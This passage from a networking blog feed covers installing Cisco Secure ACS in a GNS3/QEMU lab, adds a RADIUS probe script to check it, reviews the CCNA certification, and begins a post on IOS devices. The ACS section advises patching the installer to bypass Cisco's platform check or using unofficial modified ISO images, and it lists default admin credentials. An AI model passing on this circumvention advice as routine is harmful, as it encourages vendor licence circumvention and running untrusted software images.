of the <span class="caps">ACS</span> server is not supported anymore and is now part of history.</p>
</li>
<li>
<p>The <em><span class="caps">ACS</span> license files</em> (*<em>.lic</em> files).</p>
</li>
</ul>
<p><span class="caps">ACS</span> actively checks the hardware while booting and refuses to work in an
unsupported environment (anything other than a physical Cisco appliance or a VMware ESXi server).</p>
<p>In theory, this should also work in a VMware Player environment, as the result
should be very close to an ESXi from the guest’s point of view.
<span class="caps">ACS</span> indeed doesn’t complain and network adapters are correctly recognized, but trying
to assign them an <span class="caps">IP</span> address has no effect, making the whole thing unusable.</p>
<p>In order to have a Cisco <span class="caps">ACS</span> server in our lab, we will therefore need<sup id="fnref-esxi"><a class="footnote-ref" href="#fn-esxi">2</a></sup>
to use a Qemu virtual machine and modify the <span class="caps">ACS</span> installation packages to bypass
the platform check.</p>
<h3 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h3>
<h4 id="create-the-blank-template-node"><a class="toclink" href="#create-the-blank-template-node">Create the blank template node</a></h4>
<p>As stated earlier, the Cisco <span class="caps">ACS</span> server actively checks that the platform on
which it is running matches one of the officially supported platforms.
In order to install it under Qemu, you therefore need to modify the Cisco <span class="caps">ACS</span>
installation image to remove this check:</p>
<ul>
<li>The operation can be done <a href="http://www.securesenses.net/2012/07/installing-cisco-secure-acs-53-in.html" rel="external" title="Installing Cisco Secure ACS 5.3 in VirtualBox (SecureSense blog)">manually</a>, but it is quite complex.</li>
<li>If you are lucky, you may find already modified unofficial <span class="caps">ISO</span> images
floating around (*<em>_any_server.iso</em> files).</li>
</ul>
<p>The installation itself is straightforward.
In <span class="caps">GNS3</span>, go in <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> screen, then
create a new <span class="caps">QEMU</span> virtual machine with the following properties:</p>
<ul>
<li><em><span class="caps">RAM</span></em>: 4096 <span class="caps">MB</span></li>
<li><em>Disk image (hda)</em>: <em>Create</em> a new one, set its size to 60 000 MiB.</li>
</ul>
<p>Once the template device has been created, edit its settings:</p>
<ul>
<li><em>General</em> tab:<ul>
<li><em>Symbol</em>: set it to <em>access_server</em></li>
<li><em>Category</em>: <em>Security devices</em></li>
<li><em><span class="caps">RAM</span></em>: 4096 <span class="caps">MB</span></li>
<li><em>vCPUs</em>: 2</li>
</ul>
</li>
<li><em><span class="caps">CD</span>/<span class="caps">DVD</span></em> tab:<ul>
<li>Locate your <span class="caps">ACS</span> installation <span class="caps">DVD</span> image, there is no need to copy
it as it will be used only for the installation.</li>
</ul>
</li>
<li><em>Advanced</em><ul>
<li><em>Use as linked base <span class="caps">VM</span></em>: <span class="caps">NO</span> (we will re-enable this after the
installation, <a href="/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ul>
</li>
</ul>
<h4 id="install-the-acs-server"><a class="toclink" href="#install-the-acs-server">Install the <span class="caps">ACS</span> server</a></h4>
<p>Create the new topology below, using a <span class="caps">GNS3</span> basic switch to connect your newly
created device to a Windows guest we will use as management host.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology including an ACS server, a basic switch and a Windows host" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/topology.png"/></a></span></p>
<p>Start the <span class="caps">ACS</span> device, open its console and type <code>2</code> followed by the <em>Enter</em>
key to start the installation.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>What is this mysterious “2”?</p>
<p>Depending on your environment, the Grub boot menu may not be visible on your
console, so you are actually blindly choosing Grub’s second menu option.</p>
<p>Here is the actual Grub boot menu:</p>
<div class="codehilite"><pre>Available boot options:
[1] Cisco Secure ACS 5.2 Installation (Keyboard/Monitor)
[2] Cisco Secure ACS 5.2 Installation (Serial/Console)
[3] Reset Administrator Password (Keyboard/Monitor)
[4] Reset Administrator Password (Serial Console)
<Enter> Boot from hard disk
</pre></div>
<p>Selecting <em>2</em> thus starts the installation over the serial console.</p>
<p>You can enable the monitor by editing the device settings and switching the
<em>Console type</em> to <em>vnc</em> and removing <em>-nographic</em> from the <em>Options</em> under
the <em>Advanced</em> tab, but you may then encounter keyboard layout issues
(<span class="caps">ACS</span> only supports the <span class="caps">US</span> keyboard layout) and you will not be able to
copy-paste the terminal content.</p>
<p>It is also worth noting the presence of the Administrator password reset
utilities, as attempting to directly change this password in the
<em>/etc/shadow</em> file won’t work (the content of this file is automatically
overwritten during each boot from the <span class="caps">ACS</span> internal user database).</p>
</div>
<p>The installation process first copies the operating system files to the
hard-disk, reboots, then asks for a few settings and at last installs the <span class="caps">ACS</span>
application (don’t worry if you do not have a valid gateway or name server to
provide: just give it some placeholder <span class="caps">IP</span> address).</p>
<p>After the last install round, the <span class="caps">ACS</span> will finally restart.
Be aware that this restart may take a <em>very</em> long time (expect something like
a dozen minutes).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Randomly, the <em>“acs login:”</em> prompt may appear right at the beginning of the
booting sequence and seem frozen: this is normal, be patient, a new prompt
appears once <span class="caps">ACS</span> has effectively started.</p>
</div>
<p>If everything went normally, at the end of this starting sequence you should
get a login prompt.</p>
<p>Log in as <em>admin</em>, then shut down <span class="caps">ACS</span> using the <code>halt</code> command, accepting to save
the configuration:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">halt</span>
<span class="go">Do you want to save the current configuration ? (yes/no) [yes] ?</span>
<span class="go">Generating configuration...</span>
<span class="go">Saved the running configuration to startup successfully</span>
<span class="go">Continue with shutdown? [y/n] </span><span class="s">y</span>
<span class="go">Broadcast message from root (ttyS0) (Sun Aug 27 15:58:48 2017):</span>
<span class="go">The system is going down for system halt NOW!</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Cleanly shutting down the <span class="caps">ACS</span> server is only possible this way.</p>
<p>Previous versions of the <span class="caps">ACS</span> server used to provide this functionality also
from the web interface but this has now been removed.</p>
</div>
<h4 id="update-acs-server-files"><a class="toclink" href="#update-acs-server-files">Update <span class="caps">ACS</span> server files</a></h4>
<p>Depending on the installation media you used, you may have to replace some
files after the installation and before using the <span class="caps">ACS</span> server.
Check any accompanying documentation and ReadMe files.
The most universal and safe way to do this is to use the <a href="http://libguestfs.org/" rel="external" title="libguestfs project homepage">libguestfs</a> tools.
These tools give access to the content of virtual machine hard-disk images;
they support various image formats and include mitigation measures against malicious
disk images.</p>
<p>If you have not installed them yet, you should find them in your package
repository. To install the libguestfs tools on Debian, use:</p>
<div class="codehilite"><pre>sudo aptitude install libguestfs-tools
</pre></div>
<p>The example command below modifies the <em><span class="caps">ACS</span>-hda.qcow2</em> disk image and replaces
the file <em>flexlm-10.9.jar</em> located in the <span class="caps">ACS</span> server Apache Tomcat libraries
with one located on the host system:</p>
<div class="codehilite"><pre>virt-copy-in -a ~/GNS3/images/QEMU/ACS-hda.qcow2 ./flexlm-10.9.jar \
/opt/CSCOacs/mgmt/apache-tomcat-6.0.18/lib
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Always double-check that the device is fully shut down before modifying its
hard-disk image!</p>
<p>A concurrent write access to the disk image of a running virtual machine
almost certainly means irreparable corruption of the image.</p>
</div>
<h4 id="prepare-the-windows-management-host"><a class="toclink" href="#prepare-the-windows-management-host">Prepare the Windows management host</a></h4>
<p>If you haven’t copied the <span class="caps">ACS</span> license files to your Windows host yet, now is
the time to do it.
A convenient way to transfer them to your lab guests is to put them in an
<span class="caps">ISO</span> image which will be mounted by the guest.</p>
<p>I use <code>genisoimage</code> to generate such images.
If it is not already installed in your environment, install it (the exact
command depends on your distribution):</p>
<div class="codehilite"><pre>sudo aptitude install genisoimage
</pre></div>
<p>Use the following command to create an <span class="caps">ISO</span> image containing all *<em>.lic</em> files:</p>
<div class="codehilite"><pre>genisoimage -JR -o licences.iso *.lic
</pre></div>
<p>Edit your Windows device settings, mount this <span class="caps">ISO</span> file in the <span class="caps">CD</span>-<span class="caps">ROM</span> drive, and
start your Windows host.</p>
<h4 id="acs-server-configuration"><a class="toclink" href="#acs-server-configuration"><span class="caps">ACS</span> server configuration</a></h4>
<p>Start the <span class="caps">ACS</span> server.
As previously, open its console and be patient for the login prompt to appear.</p>
<p>Once started, the <span class="caps">ACS</span> server should be pingable from the Windows host.
If this is not the case, use the <code>show interfaces</code> command from the <span class="caps">EXEC</span> prompt
to check the network settings.</p>
<p>To modify the network settings:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">acs/admin(config)# </span><span class="k">int</span><span class="s"> gi 0</span>
<span class="gp">acs/admin(config-GigabitEthernet)# </span><span class="k">ip</span> add <span class="s">192.168.0.1</span> <span class="s">255.255.255.0</span>
<span class="go">Changing the hostname or IP may result in undesired side effects,</span>
<span class="go">such as installed application(s) being restarted.</span>
<span class="go">Are you sure you want to proceed? [y/n] y</span>
<span class="go">[truncated]</span>
<span class="gp">acs/admin(config-GigabitEthernet)# </span><span class="nb">exit</span>
<span class="gp">acs/admin(config)# </span><span class="nb">exit</span>
<span class="gp">acs/admin#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>You must type <code>int gi 0</code> even if the interface shows up as <em>eth0</em> in the
output of <code>show interfaces</code>.
As always, don’t ask me why, ask Cisco…</p>
</div>
<p>To check if all services are correctly started:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">show</span> application status acs
<span class="go">ACS role: PRIMARY</span>
<span class="go">Process 'database' running</span>
<span class="go">Process 'management' running</span>
<span class="go">Process 'runtime' running</span>
<span class="go">Process 'view-database' running</span>
<span class="go">Process 'view-jobmanager' running</span>
<span class="go">Process 'view-alertmanager' running</span>
<span class="go">Process 'view-collector' running</span>
<span class="go">Process 'view-logprocessor' running</span>
<span class="gp">acs/admin#</span>
</pre></div>
<p>To make changes persistent across reboots, use:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">copy</span> run start
<span class="go">Generating configuration...</span>
<span class="gp">acs/admin#</span>
</pre></div>
<p>On the Windows host, open a browser and access the <span class="caps">ACS</span> web interface through <span class="caps">HTTPS</span>
at the address configured on the server (<em>https://192.168.0.1</em> in the example above).</p>
<p>The <span class="caps">ACS</span> default account is <em>ACSAdmin</em> with the literal string <em>default</em> as
password (the <span class="caps">CLI</span> and Web interface administrator accounts are unrelated):</p>
<table>
<thead>
<tr>
<th>Interface</th>
<th>Login</th>
<th>Password</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong><span class="caps">CLI</span> (console)</strong></td>
<td>admin</td>
<td><em>Set during the installation.</em></td>
</tr>
<tr>
<td><strong>Web (administration)</strong></td>
<td>ACSAdmin</td>
<td>default</td>
</tr>
</tbody>
</table>
<p>On the first access to the web interface, you will have to change the default
password and upload your license files.</p>
<p>When accessing the <span class="caps">ACS</span> web interface from Internet Explorer 11, the
<em>Compatibility view</em> mode must be enabled, otherwise some pages won’t work
(for instance <em>Access Policies</em> > <em>Access Services</em> > <em>Default Device Admin</em> >
<em>Authorization</em>).
Press the <em>Alt</em> key: the <em>Compatibility view</em> option is available below
the <em>Tools</em> menu-bar option; add the <span class="caps">ACS</span> server address to the list.</p>
<p><span class="lb-small"><a href="#welcome.png" id="welcome.png-thumb" title="Click to enlarge"><img alt="ACS server welcome screen" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/welcome.png"/></a></span></p>
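<p><code>show application status acs</code> only tells you that the processes are up. As an added check, not part of the original post, the Python script below sends a <span class="caps">RADIUS</span> Access-Request to the <span class="caps">ACS</span> runtime and verifies the reply’s Response Authenticator with the shared secret, following <span class="caps">RFC</span> 2865, so that a forged or mis-addressed reply is not mistaken for a working <span class="caps">AAA</span> server. It assumes that the server is licensed, that the probing host has been declared as an <span class="caps">AAA</span> client with a <span class="caps">RADIUS</span> shared secret in the <span class="caps">ACS</span> web interface (<span class="caps">ACS</span> matches the request to the declared client by its source address), and that a test user exists in the internal user store; the post does not cover those steps. The server address 192.168.0.1 comes from the example above; the shared secret, user name, password and <span class="caps">NAS</span> address are placeholders, and <span class="caps">UDP</span> port 1812 is the standard <span class="caps">RADIUS</span> authentication port.</p>

```python
import hashlib
import os
import socket
import struct

# Packet codes and attribute types from RFC 2865.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP_ADDRESS = 1, 2, 4


def encrypt_password(password, secret, authenticator):
    """RFC 2865 section 5.2 User-Password hiding: pad the password with NULs to
    a multiple of 16 bytes, then XOR each block with MD5(secret + previous
    block), the first "previous block" being the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    hidden, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        hidden += block
        prev = block
    return hidden


def decrypt_password(hidden, secret, authenticator):
    """Inverse of encrypt_password (what the server does); padding removed."""
    clear, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        clear += bytes(h ^ k for h, k in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return clear.rstrip(b"\x00")


def _attribute(attr_type, value):
    # Type (1 byte), Length (1 byte, counting these two bytes), Value.
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(ident, username, password, secret, nas_ip, authenticator=None):
    """Return (packet, request_authenticator) for an Access-Request."""
    authenticator = authenticator or os.urandom(16)
    attrs = (_attribute(ATTR_USER_NAME, username.encode())
             + _attribute(ATTR_USER_PASSWORD,
                          encrypt_password(password.encode(), secret, authenticator))
             + _attribute(ATTR_NAS_IP_ADDRESS, socket.inet_aton(nas_ip)))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs))
    return header + authenticator + attrs, authenticator


def response_authenticator(code, ident, attrs, request_authenticator, secret):
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_authenticator + attrs + secret).digest()


def parse_response(packet, request_authenticator, secret, ident):
    """Validate a reply against the request it answers and return "accept",
    "reject" or "code N"; raise ValueError on anything suspicious."""
    if len(packet) < 20:
        raise ValueError("truncated RADIUS packet")
    code, reply_id, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet) or reply_id != ident:
        raise ValueError("length or identifier does not match the request")
    attrs = packet[20:]
    expected = response_authenticator(code, reply_id, attrs, request_authenticator, secret)
    if packet[4:20] != expected:
        raise ValueError("bad Response Authenticator: wrong shared secret or forged reply")
    return {ACCESS_ACCEPT: "accept", ACCESS_REJECT: "reject"}.get(code, f"code {code}")


def probe(server, secret, username, password, nas_ip, port=1812, timeout=5.0):
    """Send one Access-Request over UDP and return the validated verdict."""
    ident = os.urandom(1)[0]
    request, authenticator = build_access_request(ident, username, password, secret, nas_ip)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (server, port))
        reply, _ = sock.recvfrom(4096)
    return parse_response(reply, authenticator, secret, ident)


if __name__ == "__main__":
    # 192.168.0.1 is the ACS address configured above; the secret, user,
    # password and NAS address are placeholders to adapt to your lab.
    print(probe("192.168.0.1", b"labsecret", "lab", "Cisco123", "192.168.0.100"))
```

<p>An <em>accept</em> proves the whole chain (licence, <span class="caps">AAA</span> client entry, shared secret, user store) works; a <em>reject</em> still proves the runtime answers; a <code>ValueError</code> about the Response Authenticator almost always means the shared secret typed in <span class="caps">ACS</span> and in the script differ.</p>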
<h4 id="post-install"><a class="toclink" href="#post-install">Post-install</a></h4>
<p>Now that the installation is complete, don’t forget to modify the following
settings in the <span class="caps">ACS</span> template device:</p>
<ul>
<li><em><span class="caps">CD</span>/<span class="caps">DVD</span></em> tab:<ul>
<li><em>Image</em>: set it blank, otherwise <span class="caps">ACS</span> devices may refuse to start
when you move or rename the <span class="caps">ISO</span> file.</li>
</ul>
</li>
<li><em>Advanced settings</em>:<ul>
<li><em>Use as a linked base <span class="caps">VM</span></em>: Yes.</li>
</ul>
</li>
</ul>
<div class="footnote">
<hr/>
<ol>
<li id="fn-get-acs">
<p>Am I aware that a large number of <span class="caps">CCNA</span> Security students do not
have a <em>“Cisco sales representative”</em>?
Yes, but Cisco does not seem to care.
Having access to an <span class="caps">ACS</span> server is mandatory to pass your exam; you’re on your
own to figure out how to get one… <a class="footnote-backref" href="#fnref-get-acs" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-esxi">
<p>Note that ESXi can be freely downloaded from VMware’s website, so this
“need” is merely a consequence of the choices you made when building your
virtual lab.
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#software_1">More information</a>. <a class="footnote-backref" href="#fnref-esxi" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
</ol>
</div>Cisco CCNA Routing & Switching certification review2017-08-21T00:00:00+02:002017-08-21T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-21:/posts/2017/08/21/ccna-routing-switching-certification-review/<h3 id="the-five-ws"><a class="toclink" href="#the-five-ws">The five Ws</a></h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching is a technical certification about
enterprise-grade <span class="caps">IT</span> networking from Cisco.
It covers the involved devices, protocols and how to implement them
using Cisco technologies.</p>
</li>
<li>
<p><strong>When</strong>:
This is an entry-level certification with no prerequisite.</p>
</li>
<li>
<p><strong>Why</strong>:
This certification demonstrates a good level of familiarity with
enterprise networks and Cisco’s <span class="caps">IOS</span>-based devices.</p>
<p>It is a de-facto standard in terms of <span class="caps">IT</span> networking certification, valuable
even for employers using different technologies than Cisco, and
is also a prerequisite for several other Cisco certifications.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Note that some Cisco certifications do not require the full <span class="caps">CCNA</span> R&S
certification as a prerequisite, but only the <span class="caps">CCENT</span>, which is half
of the <span class="caps">CCNA</span> R&S.</p>
<p>If you are interested in networking (and I expect you are if you
intend to take a Cisco exam) I warmly encourage you to pass the full
<span class="caps">CCNA</span> R&S certification instead of limiting yourself to the <span class="caps">CCENT</span>, as
<span class="caps">IMHO</span> the latter really feels like a truncated version of the <span class="caps">CCNA</span> R&S
and makes you miss a lot of interesting areas.</p>
</div>
</li>
<li>
<p><strong>Who</strong>:
This certification is suitable for anyone willing to learn more about
enterprise-grade networking.</p>
<p>While the implementation part obviously relies on Cisco devices, the core
of this certification focuses on general knowledge on enterprise-grade
networks, in particular their architecture and various protocols involved
at each layer.</p>
</li>
<li>
<p><strong>Where</strong>:
The exam can be taken in any Pearson <span class="caps">VUE</span> test center.
It is a mix of multiple-choice questions and tasks to accomplish in a virtual lab.</p>
<p>You can get this certification through either one or two exams, depending
on your preference (personally I took the single-exam route, but the two-exam
route is equally valid).</p>
</li>
</ul>
<h3 id="training-material"><a class="toclink" href="#training-material">Training material</a></h3>
<h4 id="building-a-lab"><a class="toclink" href="#building-a-lab">Building a lab</a></h4>
<p>Building your own lab is a major part of the <span class="caps">CCNA</span> learning-path, be it a
virtual or physical lab.</p>
<ul>
<li>
<p>If you plan to work as a network engineer, I highly advise you to buy real
physical Cisco hardware.</p>
<p>The <span class="caps">CCNA</span> certification doesn’t require a lot of components and doesn’t
require latest-generation devices.
Paul Browning, author of <em>Cisco <span class="caps">CCNA</span> in 60 days</em> (see below), made a very
good video on <a href="https://www.youtube.com/watch?v=dWOlc4uu_DI" rel="external" title="CCNA Home Lab - How to Build (YouTube)">how to build your home lab</a>.</p>
</li>
<li>
<p>On my side, as a security guy I specifically wanted to focus more on the
virtualization side.
This was not an attempt to avoid using real gear, as it would
certainly have been a fun experience (and maybe easier than hunting down
firmware images and fighting virtualization issues), but we all have to manage
our available time and focus on the practical knowledge which will be
most beneficial for us down the road.
In my case, being able to build virtual networks allowing me to reproduce
vulnerabilities and attack techniques seemed more relevant.</p>
<p>Being also a free-software guy, I did not go the Cisco <span class="caps">VIRL</span> route either,
but instead learned the ins and outs of <span class="caps">GNS3</span>.
You will find all my notes on this subject in the
<a href="https://www.whitewinterwolf.com/tags/virtualization/" rel="tag" title="View articles tagged 'virtualization'">virtualization</a> section.</p>
</li>
</ul>
<p>Building a lab should mean something to you.
As I said in my <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post on professional certification</a>, the whole
process will require a lot of time and effort, so you must do this
not for a certification or for an employer, you must primarily do this
<em>for yourself</em>.</p>
<p>As Keith Barker summarizes it well in a very interesting video:
<em><a href="https://www.youtube.com/watch?v=EgTdoqcGXRA" rel="external" title="Building a Home Lab: The Mindset (YouTube)">Find your Passion</a></em>.</p>
<h4 id="learning-resources"><a class="toclink" href="#learning-resources">Learning resources</a></h4>
<ul>
<li>
<p><a href="https://www.subnetting.net/" rel="external">subnetting.net</a>:
<span class="lb-small floatright"><a href="#subnetting-net.jpg" id="subnetting-net.jpg-thumb" title="Click to enlarge"><img alt="Subnetting.net logo" src="https://www.whitewinterwolf.com/posts/2017/08/21/ccna-routing-switching-certification-review/subnetting-net.jpg"/></a></span>
Get your training from this website!
At $5 per month, I don’t think you can get cheaper, and for the price you
get very well-made videos, well-thought-out hands-on exercises, study sheets and
practice questions, and the whole gets regularly updated to follow the
evolution of Cisco’s requirements.</p>
<p>The whole thing is very well organized, with a logical progression, and
ensures proper coverage of the knowledge required both to pass the exam
and to prepare you for real life.</p>
<p><a href="https://www.subnetting.net/company-info" rel="external">Kevin and Trey</a> really did an
awesome job with this website, you seriously can’t go wrong with them!</p>
</li>
<li>
<p><a href="https://www.amazon.com/Routing-Switching-Complete-Study-Guide/dp/1119288282?tag=electronicfro-20" rel="external" title="CCNA Routing and Switching Study Guide (Amazon)">Sybex <span class="caps">CCNA</span> Routing and Switching - Study Guide</a> by Todd Lammle:
This book is massive, more than a thousand pages; I did not even
attempt to read it from cover to cover.
However, this book really shines as a secondary source for your studies
(and later) as a reference book, to get things explained a different way,
find different examples, etc.</p>
<p>While I highly recommend this book as a secondary source of information,
I would not recommend it as your main or only source.
The thousand pages of this book follow a thematic organization, which
is really great to quickly search and find some information, but awful if
you need to learn it from cover to cover and must still remember very
accurately the protocol you learned 800 pages ago and have not used since then.</p>
</li>
<li>
<p><a href="https://www.amazon.com/Cisco-CCNA-Days-William-Browning/dp/0956989292?tag=electronicfro-20" rel="external" title="Cisco CCNA in 60 Days (Amazon)">Cisco <span class="caps">CCNA</span> in 60 days</a> by Paul Browning et al.:
This book focuses on hands-on exercises with a good dose of motivational
discourse and a structured daily plan spread over 60 days to take you by the
hand and allow you to successfully pass the exam.</p>
<p>The originality of this book is indeed this 60-day plan, where each
day matches a chapter with its daily lesson and dose of practical exercises.</p>
<p>The first part of the book, where the foundations are being laid, is very
demanding, while the rest of the book, simply adding new concepts on top of the
building in an incremental way, is far easier.
I therefore highly recommend starting this book during a vacation period,
where you can easily dedicate enough of your time to get your foundations
right; you will then find it easier to mix your <span class="caps">CCNA</span> studies with your daily activity.</p>
<p>Personally I have no problem organizing my studies my own way and prefer
to do so.
I enjoyed the first part and learned the <span class="caps">IOS</span> shell with this book, but
later on it became merely a secondary study book.
But even as a secondary source of information this book remains great:
its table of contents allows you to directly find the days covering certain
notions, and the courses are always to-the-point and highly practical.</p>
<p>Moreover, the author provides a very interesting <span class="caps">PDF</span> about the mindset to
develop while working toward a certification (whether it is this one or any
other).
It is indeed Paul’s point of view that a lot of people fail not because
of technical knowledge, but because of an improper mindset, and he does
a more thorough job in this area than any other author on the subject.
This alone could be a sufficient reason to buy this book.</p>
</li>
</ul>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Cisco regularly updates its exams, requiring training books to be updated.</p>
<p>Don’t blindly buy the books linked here: they are the latest edition
available while I write this article but may be outdated when you read it.</p>
<p>Always check the exact identifier of the exam you want to take and ensure
that the book you choose matches it.</p>
</div>
<h4 id="exam-simulation"><a class="toclink" href="#exam-simulation">Exam simulation</a></h4>
<p>The <span class="caps">CCNA</span> exam is a widely known exam:</p>
<ul>
<li>
<p>Each of the above-mentioned learning sources already comes with a good pile
of questions to practice on before taking the exam.
These questions are of good quality and usually provide an explanation of
the right answer.</p>
</li>
<li>
<p>In case this is not enough for you, you can also search the web for
supplementary questions.
Beware however that the quality of the questions freely available on the
Internet may vary a lot; sometimes what is given as the right answer isn’t
even the correct one!</p>
<p>Moreover, I also refer you back to the explanation in my
<a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a> about professional certification on why you should
stay away from websites offering “brain dumps” or “real exam questions”.
There is enough legitimate learning material for the <span class="caps">CCNA</span> R&S certification
not to enter such a grey area.</p>
</li>
<li>
<p>Finally, to get familiar with the exam <span class="caps">GUI</span> and the various types of questions
you will be asked, Cisco provides a <a href="https://www.cisco.com/c/en/us/training-events/training-certifications/exam-tutorial.html" rel="external" title="Cisco Certification Exam Tutorial (Cisco)">free online exam tutorial</a>
(this requires Flash Player).
Note that a significant part of the Cisco exam goes beyond classical
multiple-choice questions and relies on a graphical interface specific to
Cisco exams.</p>
<p>You will have the same kind of tutorial on the exam day, right before
starting the test.
I recommend however that you familiarize yourself with the <span class="caps">GUI</span> <em>before</em> taking
the exam as, if you’re like me, you may want to take advantage of this
upfront time to fill your whiteboard with subnetting tables<sup id="fnref-1"><a class="footnote-ref" href="#fn-1">1</a></sup>.</p>
</li>
</ul>
<h3 id="personal-impressions"><a class="toclink" href="#personal-impressions">Personal impressions</a></h3>
<h4 id="curriculum"><a class="toclink" href="#curriculum">Curriculum</a></h4>
<p>The <span class="caps">CCNA</span> curriculum does a great job of teaching about enterprise-grade networks,
no wonder it imposed itself as a de-facto standard on the subject.</p>
<p>If you aren’t following a gold-plated, spoon-fed, thousands-of-dollars training path, you
will have to build your own lab.
While this may seem a daunting task (it is hard to choose and install
devices you don’t know yet), it is very educational.</p>
<p>The balance between Cisco-proprietary and common standard information, at least
in the sources I mentioned above, is well preserved, making this certification
useful to get a better understanding of both Cisco technologies and of the common
standards surrounding such networks.</p>
<p>The <span class="caps">CCNP</span>-level certifications, the logical sequel to the CCNAs, seem far more
focused on Cisco technologies.
You may therefore be interested in taking only the <span class="caps">CCNA</span> first, and potentially
progress toward the <span class="caps">CCNP</span> only if you find yourself hired in a position dealing
with Cisco devices on a regular basis.
Otherwise the <span class="caps">CCNA</span> R&S is a valuable certification by itself.</p>
<p>For those who take the two-exam route, on the contrary, I don’t consider the
<span class="caps">CCENT</span> to be a valuable certification by itself.
It just feels like a truncated <span class="caps">CCNA</span> R&S and has no real professional
benefit, except serving as a prerequisite for some other Cisco certifications
or, for students, as a proof of goodwill before getting their first job.</p>
<h4 id="exam"><a class="toclink" href="#exam">Exam</a></h4>
<p>The questions themselves are good: they are clear and unambiguous.
They <em>globally</em> follow the certification curriculum, but Cisco
expects students to have done their own research and practical studies,
allowing them to answer more general questions outside of the curriculum.</p>
<p>This is stated explicitly in the <a href="https://learningnetwork.cisco.com/community/certifications/ccna/ccna-exam/exam-topics" rel="external" title="Cisco Certified Network Associate: Exam Description (Cisco)"><span class="caps">CCNA</span> exam description</a>:</p>
<blockquote>
<p>The following topics are general guidelines for the content likely to be
included on the exam.
However, other related topics may also appear on any specific delivery of
the exam.</p>
</blockquote>
<p>From my personal experience however they do not abuse this; as I said,
the questions were good.</p>
<p>The only hindrance was several formatting issues in the questions,
typically broken <span class="caps">XML</span> tags randomly leaking into the question and answer captions,
on a few rare occasions making the answer more of a guess than anything else
(this exam was the only one for which I found myself regularly using the
<em>Comment</em> button to notify Cisco teams about these issues).</p>
<p>This affected about a dozen questions, with one where the answers were barely
readable, enough to make the exam feel cheap and dirty: Cisco really
should try to improve this.</p>
<h4 id="conclusion"><a class="toclink" href="#conclusion">Conclusion</a></h4>
<p>This is a very good certification.
I warmly recommend it to anyone wanting to take the step from home <span class="caps">LAN</span> knowledge
to corporate <span class="caps">LAN</span>.</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-1">
<p>The memory of me frantically filling the whiteboard with lines, numbers
and calculations <em>even before the first question was asked</em> seems odd even now, but
this is clearly the way to go to start the examination serenely :). <a class="footnote-backref" href="#fnref-1" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>How to add Cisco IOS-based devices in GNS32017-08-19T00:00:00+02:002017-08-19T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-19:/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/<p><span class="caps">GNS3</span> historical use-case was to act as a <span class="caps">GUI</span> around Dynamips to emulate Cisco
devices.
However, while stable, this emulation may not be as straightforward as it could
be and has some limitations.</p>
<p>To understand these limitations, we first need to understand how <span class="caps">IOS</span>-based
Cisco hardware works.</p>
<h3 id="how-real-gear-works"><a class="toclink" href="#how-real-gear-works">How real gear works</a></h3>
<p>Professional switch and router devices cannot be reduced to a general purpose
small-factor computer with a few additional network interfaces.</p>
<p>When using a general purpose computer with classical network adapters to build
a router/firewall appliance, all the processing occurs at the software level,
generally the operating system kernel.</p>
<p>On specialized hardware such as Cisco switches and routers, the operating
system (here <span class="caps">IOS</span>) works tightly with some underlying specific (and usually
proprietary) hardware and delegates parts or all of the processing to dedicated
chips, the Application Specific Integrated Circuits or ASICs, to allow faster processing.</p>
<p>On general-purpose computers, this can be compared with the <span class="caps">GPU</span> of a
